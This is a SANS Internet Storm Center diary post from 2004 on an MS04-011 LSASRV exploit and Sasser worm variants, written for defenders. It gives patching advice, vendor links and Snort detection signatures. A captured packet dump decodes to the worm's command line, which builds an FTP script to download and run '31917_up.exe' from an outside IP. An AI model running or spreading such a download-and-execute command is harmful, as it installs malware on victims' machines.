Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-05-01 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Updated: MS04-011 LSASRV Exploit; Sasser Worm Update: Sasser.b

Published: 2004-05-01
Last Updated: 2004-05-02 19:37:56 UTC
by Lorna Hutcheson (Version: 1)
0 comment(s)
Updated: MS04-011 LSASRV Exploit

We received reports late last night from David Tulo reporting suspicious traffic. After much analysis by many handlers and help from him by providing captures and what he was seeing (nice analysis job David), we were able to match the traffic as an exploit against the LSASRV vulnerability in MS04-011. For more information
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx


We also observed and captured similar traffic to two other locations. This traffic does match a published exploit code against the LSASRV. (Thanks to fellow handler Toby Kohlenberg for pointing out the difference in this traffic and the exploit David was seeing) The exploit is very similar to Sasser and may mislead folks in what they are seeing. The destinations port observed was 445. However, this exploit lacks the FTP attempts and the communication on ports 5554 and 9996. Also there are no files dropped on the system. It appears to determine the OS type and then attempt to shovel a shell back to a specific IP address. If it fails the LSASS crashes and the system is rebooted.

The possiblity exists for this to be turned into a worm. No sign of this yet.

It is important to make sure your systems are patched and that you block traffic on port 445 if possible.
Sasser Worm Update

Sasser.b is already confirmed in the wild. This one however drops a file called avserv2.exe. Here are two links for more information:

http://www.rav.ro/virus/showvirus.php?v=215

http://vil.nai.com/vil/content/v_125008.htm

<P>
Symantec has released their analysis of the Sasser worm and have it classified currently as a Level 3(for both versions). Their analysis can be found at

http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html

Symantec has also provided a tool for the removal of Sasser and it can be found at:

http://www.sarc.com/avcenter/venc/data/w32.sasser.removal.tool.html


LURHQ ( http://www.lurhq.com ) reports a third version which increases the number of scanning threads to 1024.
The Secunia site provides links to the major vendors and their analysis. They are also listing this as a medium threat right now.
http://secunia.com/virus_information/9142/sasser/

LURHQ has released and analysis of Sasser and can be found at:
http://www.lurhq.com/sasser.html

Eric Jacobsen wrote the following snort signature:

updated May 2nd


The first signature detects the sasser ftp command on its backdoor port (9996):

alert tcp $HOME_NET any -> any 9996 ( msg:"Sasser ftp script to transfer up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000000; rev:3;)

The second signature will trigger on the actual ftp download on port 5554:

alert tcp any any -> $HOME_NET 5554 ( msg:"Sasser binary transfer get up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000001; rev:1;)
It is based on this capture of what appears Sasser submitted to ISC by Eric Conrad:

05/01-12:05:28.458194 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49167 IpLen:20 DgmLen:48 DF

******S* Seq: 0x605F104A Ack: 0x0 Win: 0xFAF0 TcpLen: 28

TCP Options (4) => MSS: 1460 NOP NOP SackOK



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:28.498249 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49168 IpLen:20 DgmLen:40 DF

***A**** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:28.503069 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49169 IpLen:20 DgmLen:41 DF

***AP*** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

65 e



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:28.644086 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49174 IpLen:20 DgmLen:252 DF

***AP*** Seq: 0x605F104C Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65 cho off&echo ope

6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20 n 24.97.219.185

35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63 5554>>cmd.ftp&ec

68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D ho anonymous>>cm

64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26 d.ftp&echo user&

65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74 echo bin>>cmd.ft

70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37 p&echo get 31917

5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70 _up.exe>>cmd.ftp

26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66 &echo bye>>cmd.f

74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D tp&echo on&ftp -

73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F s:cmd.ftp&31917_

75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26 up.exe&echo off&

64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F del cmd.ftp&echo

20 6F 6E 0A on.



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:29.490393 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49184 IpLen:20 DgmLen:40 DF ***A***F Seq: 0x605F1120 Ack:
0xE15F8D72 Win: 0xFAF0 TcpLen: 20


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


Lorna Hutcheson

http://www.iss-md.com

Handler on Duty
Keywords:
0 comment(s)
Diary Archives